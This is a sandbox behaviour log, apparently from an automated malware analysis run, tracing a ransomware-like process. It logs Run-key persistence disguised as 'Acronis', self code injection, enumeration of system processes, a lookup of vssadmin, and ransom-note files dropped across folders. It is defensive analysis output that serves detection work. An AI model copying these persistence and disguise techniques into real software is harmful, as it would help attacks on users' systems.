- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 40045
- mode: failed
- sequenceNumber: 195
- value: C:\Users\Administrator\AppData\Roaming\WKSCLI.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 40154
- mode: failed
- sequenceNumber: 196
- value: C:\Users\Administrator\AppData\Roaming\SCHEDCLI.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 40266
- sequenceNumber: 197
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetComputerNameExW
- address: 0x76e7ce4b
- params:
- param (id:1): 0
- param (id:2): 0x76f10a6c
- param (id:3): 0x76f101c0
- apicall:
- timestamp: 40682
- sequenceNumber: 198
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: advapi32.dll
- apiname: CryptAcquireContextW
- address: 0x0041b858
- params:
- param (id:1): NULL
- param (id:2): NULL
- param (id:3): 1
- param (id:4): 4026531840
- file:
- timestamp: 40697
- mode: failed
- sequenceNumber: 199
- value: C:\Users\Administrator\AppData\Roaming\CRYPTSP.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 40822
- sequenceNumber: 200
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Process32First
- address: 0x0041bb04
- params:
- param (id:1): 0x1ec
- param (id:2): 0x18d4c8
- malicious-alert:
- classtype: Generic-Anomalous-Activity
- weight: 0
- ruleid: 8007 : Enumerating running processes ; Process is enumerating running processes
- msg: Process is enumerating running processes
- display-msg: Enumerating running processes
- regkey:
- timestamp: 40841
- mode: setval
- sequenceNumber: 201
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\zsys\"ID" = 71 56 41 eb 01 82 d4 4e
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 40882
- mode: added
- sequenceNumber: 202
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\715641EB182D44E
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 40897
- mode: setval
- sequenceNumber: 203
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\715641EB182D44E\"data" = 31 4a 46 4c 46 53 5a 59 41 48 35 52 69 65 4d 64 34 39 56 63 75 41 4a 6b 38 73 37 78 65 6d 6e 46 41 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 cc 97 27 53 35 19 85 0f 5d 87 18 12 85 32 1e 69 a8 dd f6 0f 7b 82 47 19 74 71 e9 f6 06 64 eb 98 46 e1 bf 5a d1 c4 4f d2 5a 52 2e 6d 40 80 e7 d3 de 4d 9f 4d 74 f6 9c 3f 2f 34 c9 af 41 37 ad 33 00 00 33 39 31 42 41 38 43 44 30 31 42 44 30 42 37 39 41 46 39 31 42 35 31 46 30 38 45 35 36 35 32 36 31 44 38 31 43 44 41 32 38 35 46 36 46 45 41 35 43 41 44 35 32 43 31 31 46 31 42 35 31 37 43 32 35 45 44 37 30 33 38 44 35 38 46 41 30 35 37 43 30 33 46 38 34 39 38 43 31 46 43 33 36 33 35 37 38 38 33 35 30 32 44 45 46 41 43 46 39 39 44 43 41 44 34 45 43 45 46 46 41 36 45 42 44 37 41 30 00 00 00 00 04 98 8b ca e1 f5 a2 4e 87 7f c3 26 3c d1 84 74 24 e3 e7 f3 bf ab 7c 09 36 4b f4 60 e3 16 bc ca d8 71 92 28 25 9d 15 f0 09 cb 93 eb a1 a!
- 2 65 3a 87 09 c1 dd ae 91 65 22 2c eb 4d c1 05 12 d0 b0 cf 00 00 00 00 00 00 00 00 7e 79 62 56 00 00 00 00
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 40934
- mode: setval
- sequenceNumber: 204
- value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\"EnableLinkedConnections" = 0x00000001
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10068 : Process deleting itself ; Process deleting itself in any manor
- msg: Process deleting itself in any manor
- display-msg: Process deleting itself
- regkey:
- timestamp: 41244
- mode: setval
- sequenceNumber: 205
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Run\"Acronis" = C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 41553
- sequenceNumber: 206
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: advapi32.dll
- apiname: CryptAcquireContextA
- address: 0x00412b8f
- params:
- param (id:1): NULL
- param (id:2): NULL
- param (id:3): 1
- param (id:4): 4026531840
- codeinjection:
- timestamp: 41581
- suppressed: false
- mode: multiple memory write with inline-hook code injection
- sequenceNumber: 207
- source:
- tainted: true
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- target:
- tainted: true
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- malicious-alert:
- classtype: Code-Injection-Tracking
- weight: 0
- ruleid: 4610 : Code Injection Obsevered ; Self Code Injection Tracking
- msg: Self Code Injection Tracking
- display-msg: Code Injection Obsevered
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10111 : Suspicious Code Injection ; Suspicious Self Code Injection
- msg: Suspicious Self Code Injection
- display-msg: Suspicious Code Injection
- malicious-alert:
- classtype: Code-Injection-Activity
- weight: 0
- ruleid: 4611 : Code Injection Detected ; Process performing multiple memory write with inline-hook code injection
- msg: Process performing multiple memory write with inline-hook code injection
- display-msg: Code Injection Detected
- file:
- timestamp: 41588
- mode: failed
- sequenceNumber: 208
- value: C:\Users\Administrator\AppData\Roaming\PROPSYS.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 41852
- repeat: 20
- sequenceNumber: 209
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- file:
- timestamp: 41856
- mode: created
- sequenceNumber: 210
- value: C:\Users\Administrator\Documents\recover_file_cbqytmunq.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942061
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 41867
- mode: close
- sequenceNumber: 211
- value: C:\Users\Administrator\Documents\recover_file_cbqytmunq.txt
- filesize: 253
- md5sum: 6147e70ea3212edeacd58e93a57c7b27
- sha1sum: 13583ee3327eccebd784ca18ed2da1eb7d860d57
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942061
- ntstatus: 0x0
- CreateOptions: 0x0
- codeinjection:
- timestamp: 41872
- suppressed: false
- mode: multiple memory write with inline-hook code injection
- sequenceNumber: 212
- source:
- tainted: true
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- target:
- tainted: true
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- codeinjection:
- timestamp: 41877
- suppressed: false
- mode: multiple memory write with inline-hook code injection
- sequenceNumber: 213
- source:
- tainted: true
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- target:
- tainted: true
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- codeinjection:
- timestamp: 41884
- suppressed: false
- mode: multiple memory write with inline-hook code injection
- sequenceNumber: 214
- source:
- tainted: true
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- target:
- tainted: true
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 41896
- mode: failed
- sequenceNumber: 215
- value: C:\Users\Administrator\AppData\Roaming\SECUR32.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 41900
- mode: failed
- sequenceNumber: 216
- value: C:\Users\Administrator\AppData\Roaming\API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 41905
- mode: open
- sequenceNumber: 217
- value: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
- filesize: 128
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 5910974511006141
- ntstatus: 0x0
- CreateOptions: 0x60
- process:
- timestamp: 41910
- mode: opened
- sequenceNumber: 218
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 41914
- mode: opened
- sequenceNumber: 219
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 264
- imagepath: C:\Windows\System32\smss.exe
- md5sum: 1911a3356fa3f77ccc825ccbac038c2a
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 41920
- mode: opened
- sequenceNumber: 220
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 348
- imagepath: C:\Windows\System32\csrss.exe
- md5sum: 60c2862b4bf0fd9f582ef344c2b1ec72
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 41925
- mode: opened
- sequenceNumber: 221
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 376
- imagepath: C:\Windows\System32\wininit.exe
- md5sum: 94355c28c1970635a31b3fe52eb7ceba
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 41931
- mode: opened
- sequenceNumber: 222
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 396
- imagepath: C:\Windows\System32\csrss.exe
- md5sum: 60c2862b4bf0fd9f582ef344c2b1ec72
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 41937
- mode: opened
- sequenceNumber: 223
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 432
- imagepath: C:\Windows\System32\winlogon.exe
- md5sum: 1151b1baa6f350b1db6598e0fea7c457
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 41941
- mode: opened
- sequenceNumber: 224
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 476
- imagepath: C:\Windows\System32\services.exe
- md5sum: 24acb7e5be595468e3b9aa488b9b4fcb
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 41948
- mode: opened
- sequenceNumber: 225
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 492
- imagepath: C:\Windows\System32\lsass.exe
- md5sum: 0793f40b9b8a1bdd266296409dbd91ea
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 41952
- mode: opened
- sequenceNumber: 226
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 500
- imagepath: C:\Windows\System32\lsm.exe
- md5sum: 9662ee182644511439f1c53745dc1c88
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 41957
- mode: opened
- sequenceNumber: 227
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 612
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 41961
- mode: opened
- sequenceNumber: 228
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 684
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 41994
- mode: opened
- sequenceNumber: 229
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 756
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 41999
- mode: opened
- sequenceNumber: 230
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 828
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42005
- mode: opened
- sequenceNumber: 231
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 868
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42090
- mode: opened
- sequenceNumber: 232
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 904
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42103
- mode: opened
- sequenceNumber: 233
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 968
- imagepath: C:\Windows\System32\spoolsv.exe
- md5sum: b96c17b5dc1424d56eea3a99e97428cd
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42110
- mode: opened
- sequenceNumber: 234
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1064
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42115
- mode: opened
- sequenceNumber: 235
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1164
- imagepath: C:\Windows\System32\taskhost.exe
- md5sum: 639774c9acd063f028f6084abf5593ad
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42120
- mode: opened
- sequenceNumber: 236
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1244
- imagepath: C:\Windows\System32\dwm.exe
- md5sum: f162d5f5e845b9dc352dd1bad8cef1bc
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42125
- mode: opened
- sequenceNumber: 237
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1340
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42130
- mode: opened
- sequenceNumber: 238
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1092
- imagepath: C:\Windows\explorer.exe
- md5sum: ac4c51eb24aa95b77f705ab159189e24
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42136
- mode: opened
- sequenceNumber: 239
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 940
- imagepath: C:\Windows\System32\wbem\WmiPrvSE.exe
- md5sum: 619a67c9f617b7e69315bb28ecd5e1df
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42200
- mode: opened
- sequenceNumber: 240
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1976
- imagepath: C:\Program Files\Internet Explorer\iexplore.exe
- md5sum: 0685765c0cbe095ba0c6c8790bae21ef
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42206
- mode: opened
- sequenceNumber: 241
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 384
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42210
- mode: opened
- sequenceNumber: 242
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1460
- imagepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe
- md5sum: c8a8321292a459b0a17fb39a782a5c74
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42215
- mode: opened
- sequenceNumber: 243
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1312
- imagepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe
- md5sum: c8a8321292a459b0a17fb39a782a5c74
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42220
- mode: opened
- sequenceNumber: 244
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1324
- imagepath: C:\Program Files (x86)\Internet Explorer9\iexplore.exe
- md5sum: 904e13ba41af2e353a32cf351ca53639
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42225
- mode: opened
- sequenceNumber: 245
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1852
- imagepath: C:\Program Files (x86)\Internet Explorer9\iexplore.exe
- md5sum: 904e13ba41af2e353a32cf351ca53639
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42230
- mode: opened
- sequenceNumber: 246
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2152
- imagepath: C:\Windows\System32\wbem\WmiPrvSE.exe
- md5sum: 619a67c9f617b7e69315bb28ecd5e1df
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42235
- mode: opened
- sequenceNumber: 247
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2320
- imagepath: C:\Windows\System32\taskhost.exe
- md5sum: 639774c9acd063f028f6084abf5593ad
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 42239
- mode: find
- sequenceNumber: 248
- value: C:\*
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 42242
- mode: find
- sequenceNumber: 249
- value: C:\$Recycle.Bin\*
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 42246
- mode: created
- sequenceNumber: 250
- value: C:\$Recycle.Bin\S-1-5-21-2529703413-2662079939-3113469119-500\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942063
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 42275
- mode: close
- sequenceNumber: 251
- value: C:\$Recycle.Bin\S-1-5-21-2529703413-2662079939-3113469119-500\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942063
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 42280
- mode: created
- sequenceNumber: 252
- value: C:\$Recycle.Bin\S-1-5-21-2529703413-2662079939-3113469119-500\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1688849860363608
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 42284
- mode: close
- sequenceNumber: 253
- value: C:\$Recycle.Bin\S-1-5-21-2529703413-2662079939-3113469119-500\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1688849860363608
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 42074
- sequenceNumber: 254
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x75f92cf2
- params:
- param (id:1): 0x294fa60
- param (id:2): 260
- file:
- timestamp: 42292
- mode: failed
- sequenceNumber: 255
- value: C:\Users\ADMINI~1\AppData\Local\Temp\VSSADMIN.EXE
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 42296
- mode: created
- sequenceNumber: 256
- value: C:\$Recycle.Bin\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231641
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 42091
- sequenceNumber: 257
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetVolumeNameForVolumeMountPointW
- address: 0x76220aaa
- params:
- param (id:1): NULL
- param (id:2): \\?\Volume{a4dcb962-c2b8-11e2-8b83-806e6f6e6963}\
- process:
- timestamp: 42304
- mode: opened
- sequenceNumber: 258
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42308
